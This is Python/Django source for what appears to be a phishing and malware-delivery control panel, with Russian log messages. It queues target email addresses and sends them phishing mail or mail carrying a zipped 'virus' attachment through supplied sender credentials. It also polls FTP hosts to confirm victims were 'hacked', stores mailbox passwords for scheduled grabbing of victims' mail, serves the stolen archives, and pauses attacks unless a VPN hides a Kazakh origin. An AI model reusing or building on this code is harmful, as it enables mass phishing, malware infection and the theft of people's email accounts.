def new_record(request): if "token" not in request.GET or "username" not in request.GET: return JsonResponse({"response": "field error"}) try: the_user = Users.objects.get(username=request.GET['username']) except Users.DoesNotExist: return JsonResponse({'response': 'denied'}) if request.GET['token'] != the_user.token: return JsonResponse({"response": "denied"}) answer = {"response": "ok"} try: orders = Stack.objects.all().filter(status=0) except Stack.DoesNotExist: return JsonResponse({"response": "stack error"}) records = [] for order in orders: tmp_rec = { "email": order.email, "country": order.country, "description": order.description, "method": order.method, "by_virus": order.by_virus, "by_fishing": order.by_fishing, "date_add": order.date_add, "date_hacked": order.date_hacked, "comment": order.comment, "status": order.status } records.append(tmp_rec) answer["orders"] = records logging('new_record', 'new record') return JsonResponse(answer)
def get_emails(request): if 'username' not in request.GET or 'token' not in request.GET: return JsonResponse({'response': 'filed error'}) try: the_user = Users.objects.get(username=request.GET['username']) except Users.DoesNotExist: return JsonResponse({'response': 'denied'}) if request.GET['token'] != the_user.token: return JsonResponse({"response": "denied"}) answer = {"response": "ok"} try: emails = Emails.objects.all().filter(status=1) except Emails.DoesNotExist: return JsonResponse({"response": "no emails"}) records = [] for email in emails: tmp_rec = { "email": email.email, "description": email.description, "lsdt": email.last_scan_datetime, "comment": email.comment } records.append(tmp_rec) answer["emails"] = records if get_config('grab_management') == '0': grab_manager = GrabManager() grab_manager.start() logging('get_emails', '{0} get emails'.format(the_user.username)) return JsonResponse(answer)
def add_email(request): if "token" not in request.POST or 'username' not in request.POST or "email" not in request.POST or \ "password" not in request.POST or "description" not in request.POST or "comment" not in request.POST: return JsonResponse({'response': 'filed error'}) try: the_user = Users.objects.get(username=request.POST['username']) except Users.DoesNotExist: return JsonResponse({'response': 'denied'}) if request.POST['token'] != the_user.token: return JsonResponse({"response": "denied"}) if Emails.objects.filter(email=request.POST['email']).exists(): if Emails.objects.get(email=request.POST['email']).status == '0': eml = Emails.objects.get(email=request.POST['email']) eml.status = '1' eml.save() return JsonResponse({"response": 'ok'}) else: return JsonResponse({"response": 'exists'}) eml = Emails() eml.email = request.POST['email'] eml.password = crypt(request.POST['password']) eml.description = request.POST['description'] eml.last_scan_datetime = ( datetime.datetime.now() - datetime.timedelta(days=30)).strftime('%d.%m.%Y %H:%M') eml.last_messages_datetime = eml.last_scan_datetime eml.comment = request.POST['comment'] eml.status = '1' eml.save() logging('add_email', '{0} added email.'.format(the_user.username)) return JsonResponse({"response": "ok"})
def add_to_stack(request): if 'username' not in request.POST or 'token' not in request.POST or 'emails' not in request.POST or \ 'sender' not in request.POST or 'sender_password' not in request.POST or 'subject' not in request.POST or \ 'body_name' not in request.POST or 'method' not in request.POST or 'country' not in request.POST or \ 'description' not in request.POST: return JsonResponse({'response': 'field error'}) try: the_user = Users.objects.get(username=request.POST['username']) except Users.DoesNotExist: return JsonResponse({'response': 'denied'}) if request.POST['token'] != the_user.token: return JsonResponse({"response": "denied"}) email_count = 0 emls = request.POST['emails'] emails = emls.split(",") for email in emails: email_count += 1 new_stack = Stack() new_stack.sender = request.POST['sender'] new_stack.sender_password = request.POST['sender_password'] new_stack.email = email new_stack.subject = request.POST['subject'] try: new_stack.body = Templates.objects.get( name=request.POST['body_name']).body except Templates.DoesNotExist: new_stack.body = request.POST['body_name'] new_stack.method = request.POST['method'] new_stack.date_add = date.today() new_stack.country = request.POST['country'] new_stack.description = request.POST['description'] new_stack.ftp_host = request.POST['host'] new_stack.ftp_login = request.POST['user'] new_stack.ftp_password = request.POST['pswd'] new_stack.who_hacked = request.POST['username'] new_stack.status = '0' new_stack.save() personal_logging(the_user.log_file, 'New attacking :' + email) del new_stack if email_count > 0: if get_config('attacking') == '0': atk = Attacking() atk.start() if get_config('checking_ftp') == '0': check = CheckFtp() check.start() logging('add_to_stack', '{0} added emails to stack.'.format(the_user.username)) return JsonResponse({'response': 'ok', 'emails_add': email_count})
def grab_managing(): logging('GrabManager', 'START') if get_config('grab_management') == '1': return set_config('grab_management', '1') # scan_time = get_config('scan_time') try: while True: if datetime.now().time().strftime('%H:%M') == get_config( 'scan_time') and get_config('grabbing') == '0': grabber = Grabbing() grabber.start() sleep(58) finally: set_config('grab_management', '0')
def delete_email(request): if 'username' not in request.GET or 'token' not in request.GET or "email" not in request.POST: return JsonResponse({'response': 'filed error'}) try: the_user = Users.objects.get(username=request.GET['username']) except Users.DoesNotExist: return JsonResponse({'response': 'denied'}) if request.GET['token'] != the_user.token: return JsonResponse({"response": "denied"}) try: eml = Emails.objects.get(email=request.POST['email']) except Emails.DoesNotExist: return JsonResponse({"response": "not exists"}) eml.status = "0" eml.save() logging('delete_email', '{0} deleted email.'.format(the_user.username)) return JsonResponse({"response": "ok"})
def get_arch_info(request): if 'username' not in request.GET or 'token' not in request.GET: return JsonResponse({'response': 'filed error'}) try: the_user = Users.objects.get(username=request.GET['username']) except Users.DoesNotExist: return JsonResponse({'response': 'denied'}) if request.GET['token'] != the_user.token: return JsonResponse({"response": "denied"}) if get_config('grabbing') == '1': return JsonResponse({"response": "denied"}) all_zips = Zips.objects.all() zips_dict = {} zips_record = [] zips_dict['response'] = 'ok' zips_dict['count'] = Zips.objects.count() for a_zip in all_zips: zips_record.append(a_zip.name) zips_dict['zips'] = zips_record logging('get_arch_info', '{0} getting arch info.'.format(the_user.username)) return JsonResponse(zips_dict)
def load_template(request): if 'username' not in request.POST or 'token' not in request.POST or 'name' not in request.POST or \ 'description' not in request.POST or 'template' not in request.POST: return JsonResponse({'response': 'filed error'}) try: the_user = Users.objects.get(username=request.POST['username']) except Users.DoesNotExist: return JsonResponse({'response': 'denied'}) if request.POST['token'] != the_user.token: return JsonResponse({"response": "denied"}) template = Templates() template.name = request.POST['name'] template.body = request.POST['template'] template.description = request.POST['description'] template.owner = request.POST['username'] template.save() personal_logging(the_user.log_file, 'Add template: {0}'.format(request.POST['name'])) logging( 'add_to_stack', '{0} added template {1} to templates.'.format(the_user.username, request.POST['name'])) return JsonResponse({"response": "ok"})
def get_zips(request): if 'username' not in request.GET or 'token' not in request.GET or "zip_name" not in request.GET: return JsonResponse({'response': 'filed error'}) try: the_user = Users.objects.get(username=request.GET['username']) except Users.DoesNotExist: return JsonResponse({'response': 'denied'}) if request.GET['token'] != the_user.token: return JsonResponse({"response": "denied"}) try: a_zip = Zips.objects.get(name=request.GET['zip_name']) except Zips.DoesNotExist: return JsonResponse({"response": "no_record"}) the_file = a_zip.path file_name = os.path.basename(the_file) chunk_size = 8192 response = StreamingHttpResponse( FileWrapper(open(the_file, 'rb'), chunk_size), content_type=mimetypes.guess_type(the_file)[0]) response['Content-Length'] = os.path.getsize(the_file) response['Content-Disposition'] = "attachment; filename=%s" % file_name logging('get_zips', '{0} getting zips.'.format(the_user.username)) return response
def run(self): if get_config('checking_ftp') == '1': return set_config('checking_ftp', 1) logging('check_ftp', 'START') try: while True: logging('check_ftp', 'while True:') while True: if get_config('vpn') == '1': break else: logging('check_ftp', 'not check_ip()') sleep(60) try: stack = Stack.objects.all().filter(status=1) except Stack.DoesNotExist: continue for target in stack: logging('CheckFtp', target.email) log_path = os.path.join('logs_ftp', target.ftp_host) if not os.path.exists(log_path): os.makedirs(log_path) if not os.path.isfile(os.path.join(log_path, log_file)): fl = open(os.path.join(log_path, log_file), 'w') fl.close() target.ftp_path_to_log = checker(target.ftp_host, target.ftp_login, target.ftp_password, log_path, target.ftp_path_to_log) log_text = open(os.path.join(log_path, log_file)).read() tmp_log_text = open(os.path.join(log_path, tmp_log_file)).read() if log_text != tmp_log_text: os.remove(os.path.join(log_path, log_file)) os.rename(os.path.join(log_path, tmp_log_file), os.path.join(log_path, log_file)) if target.email in tmp_log_text: target.status = "2" else: if os.path.isfile(os.path.join(log_path, tmp_log_file)): os.remove(os.path.join(log_path, tmp_log_file)) if datetime.datetime.today() - datetime.datetime.strptime(target.date_add, '%Y-%m-%d') > \ datetime.timedelta(days=days_limit): target.status = '3' target.save() sleep(random.randint(300, 600)) finally: set_config('checking_ftp', 0) return
def send_fishing(host, port, sender, sender_password, email, subject, body, file=None): logging('send_fishing', 'start') if file is not None: atk_type = 'вируса' else: atk_type = 'фишинга' logging('send_fishing', 'attack type: {0}'.format(atk_type)) try: msg = MIMEMultipart() msg['From'] = sender msg['To'] = email msg['Subject'] = subject msg.attach(MIMEText(body, 'html')) logging('send_fishing', 'msg готов') except Exception as e: logging('send_fishing', 'ExceptionL: {0}, \nпри подготовке msg'.format(e)) return 'err. Ошибка создания MIMEMultipart при отправке {0} msg: {1}'.format( atk_type, str(e)) if file is not None: file_payload = MIMEBase('application', 'octet-stream') with open(file, 'rb') as fl: file_payload.set_payload(fl.read()) fl.close() encoders.encode_base64(file_payload) file_payload.add_header( 'Content-Disposition', 'attachment; filename="{0}"'.format(os.path.basename(file))) msg.attach(file_payload) logging('send_fishing', 'FILE: {0} добавлен в attach'.format(file)) try: session = smtplib.SMTP_SSL(host, int(port)) logging('send_fishing', 'SMTP_SSL соединение...') except Exception as e: logging('send_fishing', 'EXCEPTION: SMTP_SSL соединения: {0}'.format(e)) return 'err. Ошибка подключения к хосту {0} по порту {1} при отправке {2}. Ошибка: {3}'.format( host, port, atk_type, str(e)) # try: # logging('send_fishing', 'starttls...') # session.starttls() # except Exception as e: # logging('send_fishing', 'Exception starttls: {0}'.format(e)) # return 'err. Ошибка TLS соединения для {0} с паролем {1} при отправке {2}. Ошибка: {3}'.\ # format(sender, sender_password, atk_type, str(e)) try: session.login(sender, sender_password) logging('send_fishing', 'logining...') except Exception as e: logging('send_fishing', 'Exception logining: {0}'.format(e)) return 'err. Ошибка аутентификации для {0} с паролем {1} при отправке {2}. Ошибка: {3}' \ .format(sender, sender_password, atk_type, str(e)) try: logging('send_fishing', 'sending mail...') session.sendmail(sender, email, msg.as_string().encode('utf-8')) except Exception as e: logging('send_fishing', 'Exception sendmail: {0}'.format(e)) return 'err. Ошибка при отправке {0} на почту {1}: {2}'.format( atk_type, email, str(e)) logging('send_fishing', 'quiting') session.quit() logging('send_fishing', 'finish') return 'Успешная отправка {0}: {1}'.format(atk_type, email)
def run(self): if get_config('attacking') == '1': return set_config('attacking', '1') try: while True: logging('make_an_attack', 'while True') stack = Stack.objects.all().filter(status='0') stack_count = stack.count() if stack_count == 0: set_config('attacking', '0') return for email in stack: while True: if get_config('vpn') == '1': logging('make_an_attack', 'vpn==1, break') break else: logging( 'make_an_attack', 'Не могу подключиться к VPN при атаке почты {0}. Засыпаю в ожиданий' .format(email.email)) sleep(60) logging('make_an_attack', 'vpn==1, breaked') logging('make_an_attack', 'Attacking email: {0}'.format(email.email)) result = '' try: eml_prm = EmailConfigs.objects.get( name=email.email.split('@')[1]) except EmailConfigs.DoesNotExist: logging( 'make_an_attack', 'Неизвестный Хост и Порт для {0}'.format( email.email)) continue if email.method == '1': result = send_fishing(eml_prm.host, eml_prm.port, email.sender, email.sender_password, email.email, email.subject, email.body) if email.method == '2': the_file = os.getcwd() + '/vir_dir/init.zip' # TODO: Генерация вируса и добавление пути result = send_fishing(eml_prm.host, eml_prm.port, email.sender, email.sender_password, email.email, email.subject, email.body, the_file) if email.method == '3': send_fishing_with_virus() stack_count -= 1 logging('make_an_attack', result) if result[0] == 'У': email.status = '1' else: email.status = '4' email.save() sleep(random.randint(30, 120)) del stack except Exception as e: logging('make_an_attack EXCEPT', str(e)) finally: set_config('attacking', '0')
def run(self): logging('GrabManager', 'run...') grab_managing()
def run(self): logging('VpnManager', 'Start') if get_config('vpn_manager') == '1': logging('VpnManager', 'return 1') return set_config('vpn_manager', '1') while True: try: country = get_country() logging('VpnManager', 'country = {0}'.format(country)) if country == 'KZ': set_config('vpn', '0') logging('VpnManager', 'vpn=0') else: set_config('vpn', '1') logging('VpnManager', 'vpn=1') sleep(200) except Exception: logging('VpnManager', 'Error: {0}'.format(sys.exc_info()))